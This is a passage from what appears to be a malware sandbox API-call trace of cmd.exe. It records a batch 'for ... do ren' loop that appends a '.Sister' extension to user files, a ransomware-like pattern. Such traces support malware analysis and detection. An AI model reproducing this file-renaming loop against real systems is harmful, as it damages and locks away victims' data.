lpMode=0xa6cf4fe4b8) returned 1 [0305.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.934] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0305.935] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.935] GetFileType (hFile=0x50) returned 0x2 [0305.935] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.935] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.936] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.936] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.936] GetFileType (hFile=0x50) returned 0x2 [0305.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.936] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.937] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.937] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.937] GetFileType (hFile=0x50) returned 0x2 [0305.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.938] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.940] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.940] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.940] GetFileType (hFile=0x50) returned 0x2 [0305.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.940] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.941] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.946] GetFileType (hFile=0x50) returned 0x2 [0305.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.946] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d36ba0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d36ba0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.947] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"W2kQL2VnNRU5xxXhQ.pptx.Sister\" \"W2kQL2VnNRU5xxXhQ.bat\" ") returned 57 [0305.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.947] GetFileType (hFile=0x50) returned 0x2 [0305.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.947] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.990] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x39) returned 1 [0306.000] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.000] GetFileType (hFile=0x50) returned 0x2 [0306.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.000] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.001] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.007] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.008] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.008] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.008] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.008] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.008] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.008] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.008] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.008] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.008] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.009] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.009] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.009] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.009] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.009] ??_V@YAXPEAX@Z () returned 0x1 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed9378600 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378600, Size=0x84) returned 0x21ed93796f0 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93796f0) returned 0x84 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8d44e00 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed9377100 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377100, Size=0x84) returned 0x21ed9379c90 [0306.009] GetProcessHeap () returned 0x21ed8c70000 [0306.009] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379c90) returned 0x84 [0306.010] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.010] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.010] GetProcessHeap () returned 0x21ed8c70000 [0306.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d661f0 [0306.010] GetProcessHeap () returned 0x21ed8c70000 [0306.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9370e80 [0306.010] _wcsicmp (_String1="W2kQL2VnNRU5xxXhQ.pptx", _String2=".") returned 73 [0306.010] _wcsicmp (_String1="W2kQL2VnNRU5xxXhQ.pptx", _String2="..") returned 73 [0306.010] GetFileAttributesW (lpFileName="W2kQL2VnNRU5xxXhQ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\w2kql2vnnru5xxxhq.pptx")) returned 0x20 [0306.010] GetProcessHeap () returned 0x21ed8c70000 [0306.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9437000 [0306.012] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9437010 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.012] SetErrorMode (uMode=0x0) returned 0x0 [0306.012] SetErrorMode (uMode=0x1) returned 0x0 [0306.012] GetFullPathNameW (in: lpFileName="W2kQL2VnNRU5xxXhQ.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda31fbc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx", lpFilePart=0xa6cf4fd660*="W2kQL2VnNRU5xxXhQ.pptx") returned 0x30 [0306.012] SetErrorMode (uMode=0x0) returned 0x1 [0306.013] GetProcessHeap () returned 0x21ed8c70000 [0306.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93709a0 [0306.013] _wcsicmp (_String1="W2kQL2VnNRU5xxXhQ.pptx", _String2=".") returned 73 [0306.013] _wcsicmp (_String1="W2kQL2VnNRU5xxXhQ.pptx", _String2="..") returned 73 [0306.013] GetFileAttributesW (lpFileName="W2kQL2VnNRU5xxXhQ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\w2kql2vnnru5xxxhq.pptx")) returned 0x20 [0306.013] ??_V@YAXPEAX@Z () returned 0x1 [0306.013] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.013] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.013] malloc (_Size=0xffce) returned 0x21eda32fba0 [0306.013] ??_V@YAXPEAX@Z () returned 0x21eda32fba0 [0306.014] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\w2kql2vnnru5xxxhq.pptx")) returned 0x20 [0306.014] malloc (_Size=0xffce) returned 0x21ed993f900 [0306.014] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.014] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed9370e90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9370e90) returned 0x21ed8d65890 [0306.015] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0306.015] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0306.015] ??_V@YAXPEAX@Z () returned 0x1 [0306.015] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\w2kql2vnnru5xxxhq.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\W2kQL2VnNRU5xxXhQ.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\w2kql2vnnru5xxxhq.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0306.016] FindNextFileW (in: hFindFile=0x21ed8d65890, lpFindFileData=0x21ed9370e90 | out: lpFindFileData=0x21ed9370e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc710, ftCreationTime.dwHighDateTime=0x1d5cd9a, ftLastAccessTime.dwLowDateTime=0x7f6f1820, ftLastAccessTime.dwHighDateTime=0x1d5656f, ftLastWriteTime.dwLowDateTime=0x7f6f1820, ftLastWriteTime.dwHighDateTime=0x1d5656f, nFileSizeHigh=0x0, nFileSizeLow=0x18f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="W2kQL2VnNRU5xxXhQ.pptx", cAlternateFileName="")) returned 0 [0306.018] GetLastError () returned 0x12 [0306.018] FindClose (in: hFindFile=0x21ed8d65890 | out: hFindFile=0x21ed8d65890) returned 1 [0306.018] ??_V@YAXPEAX@Z () returned 0x1 [0306.018] ??_V@YAXPEAX@Z () returned 0x1 [0306.018] ??_V@YAXPEAX@Z () returned 0x1 [0306.018] ??_V@YAXPEAX@Z () returned 0x1 [0306.018] GetProcessHeap () returned 0x21ed8c70000 [0306.018] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d657d0 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a60, Size=0x16) returned 0x21ed8c95b60 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95b60) returned 0x16 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x20) returned 0x21ed8d45b30 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d617c0 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d617c0, Size=0xb2) returned 0x21ed9375f30 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9375f30) returned 0xb2 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36dc0 [0306.019] GetProcessHeap () returned 0x21ed8c70000 [0306.019] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36dc0, Size=0x30) returned 0x21ed8d36dc0 [0306.020] GetProcessHeap () returned 0x21ed8c70000 [0306.020] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36dc0) returned 0x30 [0306.020] GetProcessHeap () returned 0x21ed8c70000 [0306.020] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36e00 [0306.020] malloc (_Size=0x1ff9c) returned 0x21eda31fbc0 [0306.020] GetProcessHeap () returned 0x21ed8c70000 [0306.020] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9376170 [0306.021] GetProcessHeap () returned 0x21ed8c70000 [0306.021] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93760b0 [0306.021] ??_V@YAXPEAX@Z () returned 0x1 [0306.021] malloc (_Size=0x1ff9c) returned 0x21eda31fbc0 [0306.021] GetProcessHeap () returned 0x21ed8c70000 [0306.021] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375db0 [0306.021] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda31fbc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0306.021] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65830 [0306.021] FindClose (in: hFindFile=0x21ed8d65830 | out: hFindFile=0x21ed8d65830) returned 1 [0306.021] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65d10 [0306.021] FindClose (in: hFindFile=0x21ed8d65d10 | out: hFindFile=0x21ed8d65d10) returned 1 [0306.022] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65bf0 [0306.022] FindClose (in: hFindFile=0x21ed8d65bf0 | out: hFindFile=0x21ed8d65bf0) returned 1 [0306.022] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0306.022] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.022] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.022] GetProcessHeap () returned 0x21ed8c70000 [0306.022] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66f30 [0306.022] ??_V@YAXPEAX@Z () returned 0x1 [0306.022] ??_V@YAXPEAX@Z () returned 0x1 [0306.023] GetProcessHeap () returned 0x21ed8c70000 [0306.023] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36e00, Size=0x490) returned 0x21ed8d36e00 [0306.023] GetProcessHeap () returned 0x21ed8c70000 [0306.023] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36e00) returned 0x490 [0306.023] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0306.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.023] GetFileType (hFile=0x50) returned 0x2 [0306.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.023] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0306.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.024] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0306.034] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.034] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.034] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0306.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.034] GetFileType (hFile=0x50) returned 0x2 [0306.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.034] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0306.035] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.035] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0306.035] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.035] GetFileType (hFile=0x50) returned 0x2 [0306.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.036] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.036] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.036] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d36dd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d36dd0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0306.037] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0306.037] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.037] GetFileType (hFile=0x50) returned 0x2 [0306.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.037] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0306.037] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.037] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0306.043] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0306.043] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.043] GetFileType (hFile=0x50) returned 0x2 [0306.043] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.043] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.044] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0306.051] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.052] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.052] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.052] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.052] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.052] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.052] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.052] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.052] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.052] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.052] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.052] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.053] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.053] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.053] ??_V@YAXPEAX@Z () returned 0x1 [0306.053] GetProcessHeap () returned 0x21ed8c70000 [0306.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0306.053] GetProcessHeap () returned 0x21ed8c70000 [0306.053] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d2d1d0 [0306.053] GetProcessHeap () returned 0x21ed8c70000 [0306.053] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d1d0) returned 0x130 [0306.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.053] malloc (_Size=0xffce) returned 0x21eda31fbc0 [0306.053] ??_V@YAXPEAX@Z () returned 0x21eda31fbc0 [0306.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.053] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda31fbc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0306.055] ??_V@YAXPEAX@Z () returned 0x1 [0306.055] GetProcessHeap () returned 0x21ed8c70000 [0306.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2e490 [0306.055] GetProcessHeap () returned 0x21ed8c70000 [0306.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) 